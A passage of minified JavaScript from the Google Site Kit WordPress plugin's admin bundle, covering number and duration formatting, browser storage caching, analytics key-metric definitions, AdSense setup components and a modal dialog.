i=(0,l.WI)(t),{haveSettingsChanged:a,isDoingSubmitChanges:o}=i(e);s()(!o(),p),s()(a(),I)}}function S(){return(e,t,i)=>{const{settings:a,savedSettings:n}=t;i&&s()(!(0,o.isEqual)((0,o.pick)(a,i),(0,o.pick)(n,i)),I),s()(!(0,o.isEqual)(a,n),I)}}},46935:e=>{"use strict";e.exports=googlesitekit.notifications},48276:(e,t,i)=>{"use strict";i.d(t,{VZ:()=>o,dc:()=>n,pH:()=>s,r0:()=>r});var a=i(84024);function s(e){try{return new URL(e).pathname}catch{}return null}function o(e,t){try{return new URL(t,e).href}catch{}return("string"==typeof e?e:"")+("string"==typeof t?t:"")}function n(e){return"string"!=typeof e?e:e.replace(/^https?:\/\/(www\.)?/i,"").replace(/\/$/,"")}function r(e,t){if(!(0,a.m)(e))return e;if(e.length<=t)return e;const i=new URL(e),s=e.replace(i.origin,"");if(s.length<t)return s;const o=s.length-Math.floor(t)+1;return"…"+s.substr(o)}},49383:e=>{"use strict";e.exports=googlesitekit.components},49481:(e,t,i)=>{"use strict";i.d(t,{f:()=>s,n:()=>a});const a="modules/search-console",s=0},49746:(e,t,i)=>{"use strict";i.d(t,{Eo:()=>g,JK:()=>I,K5:()=>p,jq:()=>m,mK:()=>d});var a=i(17243),s=i(50532),o=i.n(s),n=i(82871);function r(e,t={}){const{formatUnit:i,formatDecimal:a}=function(e,t={}){const{hours:i,minutes:a,seconds:s}=l(e);return{hours:i,minutes:a,seconds:s,formatUnit(){const{unitDisplay:o="short",...r}=t,l={unitDisplay:o,...r,style:"unit"};return 0===e?m(s,{...l,unit:"second"}):(0,n.sprintf)(/* translators: 1: formatted seconds, 2: formatted minutes, 3: formatted hours */ /* translators: 1: formatted seconds, 2: formatted minutes, 3: formatted hours */ (0,n._x)("%3$s %2$s %1$s","duration of time: hh mm ss","google-site-kit"),s?m(s,{...l,unit:"second"}):"",a?m(a,{...l,unit:"minute"}):"",i?m(i,{...l,unit:"hour"}):"").trim()},formatDecimal(){const t=(0,n.sprintf)( // translators: %s: number of seconds with "s" as the abbreviated unit. // translators: %s: number of seconds with "s" as the abbreviated unit. (0,n.__)("%ds","google-site-kit"),s);if(0===e)return t;const o=(0,n.sprintf)( // translators: %s: number of minutes with "m" as the abbreviated unit. // translators: %s: number of minutes with "m" as the abbreviated unit. (0,n.__)("%dm","google-site-kit"),a),r=(0,n.sprintf)( // translators: %s: number of hours with "h" as the abbreviated unit. // translators: %s: number of hours with "h" as the abbreviated unit. (0,n.__)("%dh","google-site-kit"),i);return(0,n.sprintf)(/* translators: 1: formatted seconds, 2: formatted minutes, 3: formatted hours */ /* translators: 1: formatted seconds, 2: formatted minutes, 3: formatted hours */ (0,n._x)("%3$s %2$s %1$s","duration of time: hh mm ss","google-site-kit"),s?t:"",a?o:"",i?r:"").trim()}}}(e,t);try{return i()}catch{return a()}}function l(e){e=parseInt(e,10),Number.isNaN(e)&&(e=0);return{hours:Math.floor(e/60/60),minutes:Math.floor(e/60%60),seconds:Math.floor(e%60)}}function c(e){return 1e6<=e?Math.round(e/1e5)/10:1e4<=e?Math.round(e/1e3):1e3<=e?Math.round(e/100)/10:e}function d(e){let t={};return"%"===e?t={style:"percent",maximumFractionDigits:2}:"s"===e?t={style:"duration",unitDisplay:"narrow"}:e&&"string"==typeof e?t={style:"currency",currency:e}:(0,a.isPlainObject)(e)&&(t={...e}),t}function g(e,t={}){e=(0,a.isFinite)(e)?e:Number(e),(0,a.isFinite)(e)||(console.warn("Invalid number",e,typeof e),e=0);const i=d(t),{style:s="metric"}=i;return"metric"===s?function(e){const t={minimumFractionDigits:1,maximumFractionDigits:1};return 1e6<=e?(0,n.sprintf)( // translators: %s: an abbreviated number in millions. // translators: %s: an abbreviated number in millions. (0,n.__)("%sM","google-site-kit"),m(c(e),e%10==0?{}:t)):1e4<=e?(0,n.sprintf)( // translators: %s: an abbreviated number in thousands. // translators: %s: an abbreviated number in thousands. (0,n.__)("%sK","google-site-kit"),m(c(e))):1e3<=e?(0,n.sprintf)( // translators: %s: an abbreviated number in thousands. // translators: %s: an abbreviated number in thousands. (0,n.__)("%sK","google-site-kit"),m(c(e),e%10==0?{}:t)):m(e,{signDisplay:"never",maximumFractionDigits:1})}(e):"duration"===s?r(e,i):"durationISO"===s?function(e){let{hours:t,minutes:i,seconds:a}=l(e);return a=("0"+a).slice(-2),i=("0"+i).slice(-2),t=("0"+t).slice(-2),"00"===t?`${i}:${a}`:`${t}:${i}:${a}`}(e):m(e,i)}const u=o()(console.warn);function m(e,t={}){const{locale:i=I(),...a}=t;try{return new Intl.NumberFormat(i,a).format(e)}catch(t){u(`Site Kit numberFormat error: Intl.NumberFormat( ${JSON.stringify(i)}, ${JSON.stringify(a)} ).format( ${typeof e} )`,t.message)}const s={currencyDisplay:"narrow",currencySign:"accounting",style:"unit"},o=["signDisplay","compactDisplay"],n={};for(const[e,t]of Object.entries(a))s[e]&&t===s[e]||o.includes(e)||(n[e]=t);try{return new Intl.NumberFormat(i,n).format(e)}catch{return new Intl.NumberFormat(i).format(e)}}function p(e,t={}){const{locale:i=I(),style:a="long",type:s="conjunction"}=t;if(Intl.ListFormat){return new Intl.ListFormat(i,{style:a,type:s}).format(e)} /* translators: used between list items, there is a space after the comma. */const o=(0,n.__)(", ","google-site-kit");return e.join(o)}function I(e=i.g){const t=(0,a.get)(e,["_googlesitekitLegacyData","locale"]);if(t){const e=t.match(/^(\w{2})?(_)?(\w{2})/);if(e&&e[0])return e[0].replace(/_/g,"-")}return e.navigator.language}},49993:(e,t,i)=>{"use strict";i.d(t,{Gq:()=>g,IL:()=>I,LD:()=>m,SO:()=>u,a2:()=>s,xD:()=>p});var a=i(6109);const s="googlesitekit_",o=`${s}1.170.0_${i.g._googlesitekitBaseData.storagePrefix}_`,n=["sessionStorage","localStorage"];let r,l=[...n];async function c(e){const t=i.g[e];if(!t)return!1;try{const e="__storage_test__";return t.setItem(e,e),t.removeItem(e),!0}catch(e){return e instanceof DOMException&&(22===e.code||1014===e.code||"QuotaExceededError"===e.name||"NS_ERROR_DOM_QUOTA_REACHED"===e.name)&&0!==t.length}}async function d(){if(void 0!==r)return r;for(const e of l)r||await c(e)&&(r=i.g[e]);return void 0===r&&(r=null),r}async function g(e){const t=await d();if(t){const i=t.getItem(`${o}${e}`);if(i){const e=JSON.parse(i),{timestamp:t,ttl:a,value:s,isError:o}=e;if(t&&(!a||Math.round(Date.now()/1e3)-t<a))return{cacheHit:!0,value:s,isError:o}}}return{cacheHit:!1,value:void 0}}async function u(e,t,{ttl:s=a.Jg,timestamp:n=Math.round(Date.now()/1e3),isError:r=!1}={}){const l=await d();if(l)try{return l.setItem(`${o}${e}`,JSON.stringify({timestamp:n,ttl:s,value:t,isError:r})),!0}catch(e){return i.g.console.warn("Encountered an unexpected storage error:",e),!1}return!1}async function m(e){const t=await d();if(t)try{const i=e.startsWith(s)?e:`${o}${e}`;return t.removeItem(i),!0}catch(e){return i.g.console.warn("Encountered an unexpected storage error:",e),!1}return!1}async function p(){const e=await d();if(e)try{const t=[];for(let i=0;i<e.length;i++){const a=e.key(i);0===a.indexOf(s)&&t.push(a)}return t}catch(e){return i.g.console.warn("Encountered an unexpected storage error:",e),[]}return[]}async function I(){if(await d()){const e=await p();for(const t of e)await m(t);return!0}return!1}},50231:(e,t,i)=>{"use strict";i.d(t,{A:()=>g});var a=i(62688),s=i.n(a),o=i(17243),n=i(4452),r=i.n(n),l=i(31589),c=i(63696),d=i(62540);function TableOverflowContainer({children:e}){const[t,i]=(0,c.useState)(!1),a=(0,c.useRef)(),s=(0,o.debounce)(n,100);function n(){if(!a.current)return;const{scrollLeft:e,scrollWidth:t,offsetWidth:s}=a.current,o=t-s;i(e<o-16&&0<o-16)}return(0,l.A)("resize",s),(0,c.useEffect)(()=>{n()},[]),(0,d.jsx)("div",{onScroll:(0,o.debounce)(n,100),className:r()("googlesitekit-table-overflow",{"googlesitekit-table-overflow--gradient":t}),children:(0,d.jsx)("div",{ref:a,className:"googlesitekit-table-overflow__container",children:e})})}TableOverflowContainer.propTypes={children:s().element};const g=TableOverflowContainer},50304:(e,t,i)=>{"use strict";i.d(t,{A:()=>IconWrapper});var a=i(62688),s=i.n(a),o=i(62540);function IconWrapper({children:e,marginLeft:t,marginRight:i}){return(0,o.jsx)("span",{className:"googlesitekit-icon-wrapper",style:{marginLeft:t,marginRight:i},children:e})}IconWrapper.propTypes={children:s().node.isRequired,marginLeft:s().number,marginRight:s().number}},50454:(e,t,i)=>{"use strict";i.d(t,{G:()=>g});var a=i(82871),s=i(97345),o=i(29785),n=i(80);function r({select:e,slug:t}){return e(n.K9).hasConversionReportingEvents(this.requiredConversionEventName)||e(s.oR).isKeyMetricActive(t)}var l=i(7144);function c({select:e,isViewOnlyDashboard:t}){return!t||!(!t||!e(n.K9).getAdSenseLinked())}function d({select:e,isViewOnlyDashboard:t}){return!t||e(n.K9).hasCustomDimensions(this.requiredCustomDimensions)}const g={[s.p3]:{title:(0,a.__)("Top earning pages","google-site-kit"),description:(0,a.__)("Pages that generated the most AdSense revenue","google-site-kit"),infoTooltip:(0,a.__)("Pages that generated the most AdSense revenue","google-site-kit"),displayInSelectionPanel:c,displayInList:c,metadata:{group:l.hs.SLUG}},[s.BT]:{title:(0,a.__)("Top recent trending pages","google-site-kit"),description:(0,a.__)("Pages with the most pageviews published in the last 3 days","google-site-kit"),infoTooltip:(0,a.__)("Pages with the most pageviews published in the last 3 days","google-site-kit"),requiredCustomDimensions:["googlesitekit_post_date"],displayInSelectionPanel:d,displayInWidgetArea:d,displayInList:d,metadata:{group:l.hs.SLUG}},[s.tB]:{title:(0,a.__)("Most popular authors by pageviews","google-site-kit"),description:(0,a.__)("Authors whose posts got the most visits","google-site-kit"),infoTooltip:(0,a.__)("Authors whose posts got the most visits","google-site-kit"),requiredCustomDimensions:["googlesitekit_post_author"],displayInSelectionPanel:d,displayInWidgetArea:d,displayInList:d,metadata:{group:l.hs.SLUG}},[s.t1]:{title:(0,a.__)("Top categories by pageviews","google-site-kit"),description:(0,a.__)("Categories that your site visitors viewed the most","google-site-kit"),infoTooltip:(0,a.__)("Categories that your site visitors viewed the most","google-site-kit"),requiredCustomDimensions:["googlesitekit_post_categories"],displayInSelectionPanel:d,displayInWidgetArea:d,displayInList:d,metadata:{group:l.hs.SLUG}},[s.ep]:{title:(0,a.__)("Most popular content by pageviews","google-site-kit"),description:(0,a.__)("Pages that brought in the most visitors","google-site-kit"),infoTooltip:(0,a.__)("Pages your visitors read the most","google-site-kit"),metadata:{group:l.hs.SLUG}},[s.pG]:{title:(0,a.__)("Most popular products by pageviews","google-site-kit"),description:(0,a.__)("Products that brought in the most visitors","google-site-kit"),requiredCustomDimensions:["googlesitekit_post_type"],displayInSelectionPanel:({select:e})=>e(s.oR).isKeyMetricActive(s.pG)||e(o.O4).getProductPostType(),displayInWidgetArea:d,metadata:{group:l.GF.SLUG}},[s.nH]:{title:(0,a.__)("Pages per visit","google-site-kit"),description:(0,a.__)("Number of pages visitors viewed per session on average","google-site-kit"),infoTooltip:(0,a.__)("Number of pages visitors viewed per session on average","google-site-kit"),metadata:{group:l.IX.SLUG}},[s.J5]:{title:(0,a.__)("Visit length","google-site-kit"),description:(0,a.__)("Average duration of engaged visits","google-site-kit"),infoTooltip:(0,a.__)("Average duration of engaged visits","google-site-kit"),metadata:{group:l.IX.SLUG}},[s.Yw]:{title:(0,a.__)("Visits per visitor","google-site-kit"),description:(0,a.__)("Average number of sessions per site visitor","google-site-kit"),infoTooltip:(0,a.__)("Average number of sessions per site visitor","google-site-kit"),metadata:{group:l.IX.SLUG}},[s.UY]:{title:(0,a.__)("Most engaging pages","google-site-kit"),description:(0,a.__)("Pages with the highest engagement rate","google-site-kit"),infoTooltip:(0,a.__)("Pages with the highest engagement rate","google-site-kit"),metadata:{group:l.hs.SLUG}},[s.gC]:{title:(0,a.__)("Least engaging pages","google-site-kit"),description:(0,a.__)("Pages with the highest percentage of visitors that left without engagement with your site","google-site-kit"),infoTooltip:(0,a.__)("Percentage of visitors that left without engagement with your site","google-site-kit"),metadata:{group:l.hs.SLUG}},[s.tK]:{title:(0,a.__)("Top pages by returning visitors","google-site-kit"),description:(0,a.__)("Pages that attracted the most returning visitors","google-site-kit"),infoTooltip:(0,a.__)("Pages that attracted the most returning visitors","google-site-kit"),metadata:{group:l.IX.SLUG}},[s.fu]:{title:(0,a.__)("New visitors","google-site-kit"),description:(0,a.__)("How many new visitors you got and how the overall audience changed","google-site-kit"),infoTooltip:(0,a.__)("Portion of visitors who visited your site for the first time in this timeframe","google-site-kit"),metadata:{group:l.IX.SLUG}},[s.dX]:{title:(0,a.__)("Returning visitors","google-site-kit"),description:(0,a.__)("Portion of people who visited your site more than once","google-site-kit"),infoTooltip:(0,a.__)("Portion of your site’s visitors that returned at least once in this timeframe","google-site-kit"),metadata:{group:l.IX.SLUG}},[s.SS]:{title:(0,a.__)("Top traffic source","google-site-kit"),description:(0,a.__)("Channel which brought in the most visitors to your site","google-site-kit"),infoTooltip:(0,a.__)("Channel (e.g. social, paid, search) that brought in the most visitors to your site","google-site-kit"),metadata:{group:l.wb.SLUG}},[s.Vl]:{title:(0,a.__)("Top traffic source driving add to cart","google-site-kit"),description:(0,a.__)("Channel which brought in the most add to cart events to your site","google-site-kit"),infoTooltip:(0,a.__)("Channel (e.g. social, paid, search) that brought in the most add to cart events to your site","google-site-kit"),requiredConversionEventName:[n.nc.ADD_TO_CART],displayInSelectionPanel:r,displayInList:r,metadata:{group:l.GF.SLUG}},[s.u_]:{title:(0,a.__)("Top traffic source driving leads","google-site-kit"),description:(0,a.__)("Channel which brought in the most leads to your site","google-site-kit"),infoTooltip:(0,a.__)("Channel (e.g. social, paid, search) that brought in the most leads to your site","google-site-kit"),requiredConversionEventName:[n.nc.SUBMIT_LEAD_FORM,n.nc.CONTACT,n.nc.GENERATE_LEAD],displayInSelectionPanel:r,displayInList:r,metadata:{group:l.XU.SLUG}},[s.HA]:{title:(0,a.__)("Top traffic source driving purchases","google-site-kit"),description:(0,a.__)("Channel which brought in the most purchases to your site","google-site-kit"),infoTooltip:(0,a.__)("Channel (e.g. social, paid, search) that brought in the most purchases to your site","google-site-kit"),requiredConversionEventName:[n.nc.PURCHASE],displayInSelectionPanel:r,displayInList:r,metadata:{group:l.GF.SLUG}},[s.GT]:{title:(0,a.__)("Most engaged traffic source","google-site-kit"),description:(0,a.__)("Visitors coming via this channel spent the most time on your site","google-site-kit"),infoTooltip:(0,a.__)("Channel (e.g. social, paid, search) that brought in the most visitors who had a meaningful engagement with your site","google-site-kit"),metadata:{group:l.wb.SLUG}},[s.qy]:{title:(0,a.__)("Top converting traffic source","google-site-kit"),description:(0,a.__)("Channel which brought in the most visits that resulted in key events","google-site-kit"),infoTooltip:(0,a.__)("Channel (e.g. social, paid, search) that brought in visitors who generated the most key events","google-site-kit"),metadata:{group:l.wb.SLUG}},[s.GM]:{title:(0,a.__)("Top cities driving traffic","google-site-kit"),description:(0,a.__)("Which cities you get the most visitors from","google-site-kit"),infoTooltip:(0,a.__)("The cities where most of your visitors came from","google-site-kit"),metadata:{group:l.wb.SLUG}},[s.CQ]:{title:(0,a.__)("Top cities driving leads","google-site-kit"),description:(0,a.__)("Cities driving the most contact form submissions","google-site-kit"),infoTooltip:(0,a.__)("Cities driving the most contact form submissions","google-site-kit"),requiredConversionEventName:[n.nc.SUBMIT_LEAD_FORM,n.nc.CONTACT,n.nc.GENERATE_LEAD],displayInSelectionPanel:r,displayInList:r,metadata:{group:l.XU.SLUG}},[s.Xq]:{title:(0,a.__)("Top cities driving add to cart","google-site-kit"),description:(0,a.__)("Cities where visitors most frequently add products to their carts","google-site-kit"),infoTooltip:(0,a.__)("Cities where visitors most frequently add products to their carts","google-site-kit"),requiredConversionEventName:[n.nc.ADD_TO_CART],displayInSelectionPanel:r,displayInList:r,metadata:{group:l.GF.SLUG}},[s.JF]:{title:(0,a.__)("Top cities driving purchases","google-site-kit"),description:(0,a.__)("Cities driving the most purchases","google-site-kit"),infoTooltip:(0,a.__)("Cities driving the most purchases","google-site-kit"),requiredConversionEventName:[n.nc.PURCHASE],displayInSelectionPanel:r,displayInList:r,metadata:{group:l.GF.SLUG}},[s.YQ]:{title:(0,a.__)("Top device driving purchases","google-site-kit"),description:(0,a.__)("Top device driving the most purchases","google-site-kit"),infoTooltip:(0,a.__)("Top device driving the most purchases","google-site-kit"),requiredConversionEventName:[n.nc.PURCHASE],displayInSelectionPanel:r,displayInList:r,metadata:{group:l.GF.SLUG}},[s.dV]:{title:(0,a.__)("Top countries driving traffic","google-site-kit"),description:(0,a.__)("Which countries you get the most visitors from","google-site-kit"),infoTooltip:(0,a.__)("The countries where most of your visitors came from","google-site-kit"),metadata:{group:l.wb.SLUG}},[s.t7]:{title:(0,a.__)("Top performing keywords","google-site-kit"),description:(0,a.__)("What people searched for before they came to your site","google-site-kit"),infoTooltip:(0,a.__)("The top search queries for your site by highest clickthrough rate","google-site-kit"),metadata:{group:l.wb.SLUG}},[s.HP]:{title:(0,a.__)("Top pages driving leads","google-site-kit"),description:(0,a.__)("Pages on which forms are most frequently submitted","google-site-kit"),requiredConversionEventName:[n.nc.SUBMIT_LEAD_FORM,n.nc.CONTACT,n.nc.GENERATE_LEAD],displayInSelectionPanel:r,displayInList:r,metadata:{group:l.XU.SLUG}}}},50464:(e,t,i)=>{"use strict";i.d(t,{A:()=>n,G:()=>o});var a=i(62688),s=i.n(a);const o=" ";function DisplaySetting({value:e}){return e||o}DisplaySetting.propTypes={value:s().oneOfType([s().string,s().bool,s().number])};const n=DisplaySetting},50477:(e,t,i)=>{"use strict";i.d(t,{C:()=>o,p:()=>s});var a=i(55465);function s(e,t={}){return{__html:a.O.sanitize(e,t)}}function o(e){const t="object"==typeof e?e.toString():e;return t?.replace?.(/\/+$/,"")}},50539:e=>{"use strict";e.exports=googlesitekit.data},51858:(e,t,i)=>{"use strict";i.d(t,{cN:()=>l,yD:()=>d});var a=i(32091),s=i.n(a),o=i(84024),n=i(30511),r=i(80);function l({siteName:e,siteURL:t,timezone:i},a=Intl.DateTimeFormat().resolvedOptions().timeZone){s()((0,o.m)(t),"A valid siteURL is required.");const{hostname:l,pathname:c}=new URL(t);return{accountName:e||l,propertyName:`${l}${c}`.replace(/\/$/,""),dataStreamName:l,countryCode:n.hd[i]||n.hd[a],timezone:n.hd[i]?i:a,[r.aj]:!0}}function c(e){const t=e.account?.match(/accounts\/([^/]+)/),i=t?.[1];return{...e,_id:i}}function d(e){return Array.isArray(e)?e.map(e=>({...c(e),propertySummaries:(e.propertySummaries||[]).map(e=>function(e){const t=e.property?.match(/properties\/([^/]+)/),i=t?.[1],a=e.parent?.match(/accounts\/([^/]+)/),s=a?.[1];return{...e,_id:i,_accountID:s}}(e))})):e}},52274:(e,t,i)=>{"use strict";i.d(t,{i:()=>n});var a=i(63696),s=i(50539),o=i(7972);function n(e){const{setValue:t}=(0,s.useDispatch)(o.n);return(0,a.useCallback)(()=>{t("admin-screen-tooltip",{isTooltipVisible:!0,...e})},[t,e])}},52721:(e,t,i)=>{"use strict";i.d(t,{w:()=>r});var a=i(35470),s=i(63696),o=i(85097);function n(){}function r(e,t){const i=(0,o.W)({sticky:!0}),r=(0,s.useRef)(),l=(0,s.useCallback)(e,t),c=(0,a.A)(i?l:n);return i&&(r.current=c),r.current}},52735:(e,t,i)=>{"use strict";i.d(t,{A:()=>a});const a=(0,i(63696).createContext)(!1)},54286:(e,t,i)=>{"use strict";i.d(t,{A:()=>r});var a=i(62688),s=i.n(a),o=i(33052),n=i(62540);function WidgetHeaderTitle({title:e}){return(0,n.jsx)(o.A,{className:"googlesitekit-widget__header-title",as:"h3",type:"title",size:"small",children:e})}WidgetHeaderTitle.propTypes={title:s().string.isRequired};const r=WidgetHeaderTitle},54419:e=>{"use strict";e.exports=googlesitekit.api},55103:(e,t,i)=>{"use strict";i.d(t,{A:()=>SupportLink});var a=i(62688),s=i.n(a),o=i(50539),n=i(29785),r=i(38432),l=i(62540);function SupportLink(e){const{path:t,query:i,hash:a,...s}=e,c=(0,o.useSelect)(e=>e(n.O4).getGoogleSupportURL({path:t,query:i,hash:a}));return(0,l.jsx)(r.A,{...s,href:c})}SupportLink.propTypes={path:s().string.isRequired,query:s().object,hash:s().string}},55465:(e,t,i)=>{"use strict";i.d(t,{O:()=>s});var a=i(31234);const s=i.n(a)()(i.g)},55989:(e,t,i)=>{"use strict";i.d(t,{A:()=>l});var a=i(62688),s=i.n(a),o=i(4452),n=i.n(o),r=i(62540);function VisuallyHidden({className:e,children:t,...i}){return t?(0,r.jsx)("span",{...i,className:n()("screen-reader-text",e),children:t}):null}VisuallyHidden.propTypes={className:s().string,children:s().node},VisuallyHidden.defaultProps={className:""};const l=VisuallyHidden},56768:(e,t,i)=>{"use strict";i.d(t,{N:()=>d,g:()=>g});var a=i(32091),s=i.n(a),o=i(17243),n=i(90187),r=i(84024),l=i(51568),c=i(29785);function d(e,t){const i=t.find(t=>t.test(e));return!!i&&i.exec(e)[1]}const g=(0,o.memoize)(async({homeURL:e,ampMode:t})=>{s()((0,r.m)(e),"homeURL must be valid URL");const i=[e];if(c.OQ===t)try{const e=await(0,n.default)({path:"/wp/v2/posts?per_page=1"}).then(e=>e.slice(0,1).map(e=>(0,l.F)(e.link,{amp:1})).pop());e&&i.push(e)}catch{return i}return i})},58240:(e,t,i)=>{"use strict";i.d(t,{QB:()=>AccountSelect,gx:()=>AdSenseLinkCTA,Ve:()=>N.Ay,kg:()=>ErrorNotices,TZ:()=>UseSnippetSwitch,Fv:()=>UserProfile});var a=i(63696),s=i(82871),o=i(49383),n=i(50539),r=i(6109),l=i(35952),c=i(62659),d=i(62540);function AccountSelect(){const e=`${(0,c.A)()}_adsense`,t=(0,n.useSelect)(e=>e(l.wl).getAccountID()),i=(0,n.useSelect)(e=>e(l.wl).getAccounts()),g=(0,n.useSelect)(e=>e(l.wl).hasFinishedResolution("getAccounts")),{setAccountID:u}=(0,n.useDispatch)(l.wl),m=(0,a.useCallback)((i,a)=>{const s=a.dataset.value;t!==s&&(u(s),(0,r.sx)(e,"change_account"))},[t,e,u]);return g?(0,d.jsx)(o.Select,{className:"googlesitekit-adsense__select-account",label:(0,s.__)("Account","google-site-kit"),value:t,onEnhancedChange:m,enhanced:!0,outlined:!0,children:(i||[]).map(({_id:e,displayName:t},i)=>(0,d.jsx)(o.Option,{value:e,children:t},i))}):(0,d.jsx)(o.ProgressBar,{small:!0})}var g=i(12317),u=i(29785);function AdSenseLinkCTA({onClick:e=()=>{}}){const t=(0,n.useSelect)(e=>e(u.O4).getGoogleSupportURL({path:"/adsense/answer/6084409"}));return(0,d.jsx)(g.A,{title:(0,s.__)("Link Analytics and AdSense","google-site-kit"),description:(0,s.__)("Get reports for your top earning pages by linking your Analytics and AdSense accounts","google-site-kit"),ctaLink:t,ctaLabel:(0,s.__)("Learn more","google-site-kit"),onClick:e,ctaLinkExternal:!0})}var m=i(78014),p=i(62688),I=i.n(p);function ErrorNotices({hasButton:e=!1}){return(0,d.jsx)(m.A,{hasButton:e,moduleSlug:"adsense",storeName:l.wl})}ErrorNotices.propTypes={hasButton:I().bool};var h=i(97345);function UserProfile(){const e=(0,n.useSelect)(e=>e(h.oR).getEmail()),t=(0,n.useSelect)(e=>e(h.oR).getPicture());return(0,n.useSelect)(e=>e(h.oR).hasFinishedResolution("getUser"))?(0,d.jsxs)("p",{className:"googlesitekit-setup-module__user",children:[(0,d.jsx)("img",{className:"googlesitekit-setup-module__user-image",src:t,alt:""}),(0,d.jsx)("span",{className:"googlesitekit-setup-module__user-email",children:e})]}):(0,d.jsx)(o.ProgressBar,{small:!0})}var y=i(79257),A=i(5855),M=i(25797);function UseSnippetSwitch(e){const{label:t=(0,s.__)("Let Site Kit place AdSense code on your site","google-site-kit"),checkedMessage:i,uncheckedMessage:g,saveOnChange:u}=e,m=`${(0,c.A)()}_adsense`,p=(0,n.useSelect)(e=>e(l.wl).getUseSnippet()),I=(0,n.useSelect)(e=>e(l.wl).isDoingSubmitChanges()),{setUseSnippet:h,saveSettings:N}=(0,n.useDispatch)(l.wl),f=(0,a.useCallback)(async()=>{h(!p),u&&await N()},[p,u,h,N]);return(0,y.A)(()=>{(0,r.sx)(m,p?"enable_tag":"disable_tag")},[m,p]),void 0===p?null:(0,d.jsxs)(a.Fragment,{children:[(0,d.jsxs)("div",{className:"googlesitekit-setup-module__switch",children:[(0,d.jsx)(o.Switch,{label:t,onClick:f,checked:p,disabled:I,hideLabel:!1})," ",(0,d.jsx)(A.A,{className:"googlesitekit-badge--primary",label:(0,s.__)("Recommended","google-site-kit")})]}),p&&i&&(0,d.jsx)(M.A,{className:"googlesitekit-notice--bottom-margin",type:M.A.TYPES.INFO,description:i}),!p&&g&&(0,d.jsx)(M.A,{className:"googlesitekit-notice--bottom-margin",type:M.A.TYPES.INFO,description:g})]})}UseSnippetSwitch.propTypes={label:I().string,checkedMessage:I().string,uncheckedMessage:I().string,saveOnChange:I().bool},UseSnippetSwitch.defaultProps={saveOnChange:!1};i(10626);var N=i(45454);i(42616)},58718:(e,t,i)=>{"use strict";i.d(t,{CX:()=>s,Py:()=>n,SM:()=>a,kj:()=>o});const a="adsense-connect-cta",s="adsense-connect-cta-tooltip-state",o="adsense-ga4-top-earnings-notice",n="adsense"},59352:(e,t,i)=>{"use strict";i.r(t),i.d(t,{CONTEXT_ENTITY_DASHBOARD_CONTENT:()=>c,CONTEXT_ENTITY_DASHBOARD_MONETIZATION:()=>g,CONTEXT_ENTITY_DASHBOARD_SPEED:()=>d,CONTEXT_ENTITY_DASHBOARD_TRAFFIC:()=>l,CONTEXT_MAIN_DASHBOARD_CONTENT:()=>o,CONTEXT_MAIN_DASHBOARD_KEY_METRICS:()=>a,CONTEXT_MAIN_DASHBOARD_MONETIZATION:()=>r,CONTEXT_MAIN_DASHBOARD_SPEED:()=>n,CONTEXT_MAIN_DASHBOARD_TRAFFIC:()=>s,default:()=>u});const a="mainDashboardKeyMetrics",s="mainDashboardTraffic",o="mainDashboardContent",n="mainDashboardSpeed",r="mainDashboardMonetization",l="entityDashboardTraffic",c="entityDashboardContent",d="entityDashboardSpeed",g="entityDashboardMonetization",u={CONTEXT_MAIN_DASHBOARD_KEY_METRICS:a,CONTEXT_MAIN_DASHBOARD_TRAFFIC:s,CONTEXT_MAIN_DASHBOARD_CONTENT:o,CONTEXT_MAIN_DASHBOARD_SPEED:n,CONTEXT_MAIN_DASHBOARD_MONETIZATION:r,CONTEXT_ENTITY_DASHBOARD_TRAFFIC:l,CONTEXT_ENTITY_DASHBOARD_CONTENT:c,CONTEXT_ENTITY_DASHBOARD_SPEED:d,CONTEXT_ENTITY_DASHBOARD_MONETIZATION:g}},59865:(e,t,i)=>{"use strict";i.d(t,{A:()=>m});var a=i(62688),s=i.n(a),o=i(4452),n=i.n(o),r=i(52684),l=i(13606),c=i(82871),d=i(49383),g=i(85149),u=i(62540);function ModalDialog({className:e="",dialogActive:t=!1,handleCancel:i=null,onOpen:a=null,onClose:s=null,title:o=null,provides:m,handleConfirm:p,subtitle:I,confirmButton:h=null,notes:y=[],danger:A=!1,inProgress:M=!1,small:N=!1,medium:f=!1,buttonLink:T=null}){const S=`googlesitekit-dialog-description-${(0,r.A)(ModalDialog)}`,k=!(!m||!m.length);return(0,u.jsxs)(d.Dialog,{open:t,onOpen:a,onClose:s,"aria-describedby":k?S:void 0,tabIndex:"-1",className:n()(e,{"googlesitekit-dialog-sm":N,"googlesitekit-dialog-md":f}),children:[(0,u.jsxs)(d.DialogTitle,{children:[A&&(0,u.jsx)(g.A,{width:28,height:28}),o]}),I?(0,u.jsx)("p",{className:"mdc-dialog__lead",children:I}):[],(0,u.jsxs)(d.DialogContent,{children:[k&&(0,u.jsx)("section",{id:S,className:"mdc-dialog__provides",children:(0,u.jsx)("ul",{className:"mdc-list mdc-list--underlined mdc-list--non-interactive",children:m.map(e=>(0,u.jsx)("li",{className:"mdc-list-item",children:(0,u.jsx)("span",{className:"mdc-list-item__text",children:e})},e))})}),y.length>0&&(0,u.jsx)("section",{className:"mdc-dialog__notes",children:y.map((e,t)=>(0,u.jsxs)("p",{className:"mdc-dialog__note",children:["string"==typeof e&&(0,l.A)((0,c.sprintf)(/* translators: %s is replaced with some sub-note text. */ /* translators: %s is replaced with some sub-note text. */ (0,c.__)("<strong>Note:</strong> %s","google-site-kit"),e),{strong:(0,u.jsx)("strong",{})}),"function"==typeof e&&(0,u.jsx)(e,{})]},`note-${t}`))})]}),(0,u.jsxs)(d.DialogFooter,{children:[(0,u.jsx)(d.Button,{className:"mdc-dialog__cancel-button",onClick:i,disabled:M,tertiary:!0,children:(0,c.__)("Cancel","google-site-kit")}),T?(0,u.jsx)(d.Button,{href:T,onClick:p,target:"_blank",danger:A,children:h}):(0,u.jsx)(d.SpinnerButton,{onClick:p,danger:A,disabled:M,isSaving:M,children:h||(0,c.__)("Disconnect","google-site-kit")})]})]})}ModalDialog.displayName="Dialog",ModalDialog.propTypes={className:s().string,dialogActive:s().bool,handleDialog:s().func,handleConfirm:s().func.isRequired,onOpen:s().func,onClose:s().func,title:s().string,provides:s().arrayOf(s().string),confirmButton:s().string,notes:s().arrayOf(s().oneOfType([s().string,s().elementType])),danger:s().bool,small:s().bool,medium:s().bool,buttonLink:s().string};const m=ModalDialog},60515:(e,t,i)=>{"use strict";i.d(t,{A:()=>m});var a=i(62688),s=i.n(a),o=i(4452),n=i.n(o),r=i(63696),l=i(82871),c=i(49383),d=i(5855),g=i(38432),u=i(62540);function 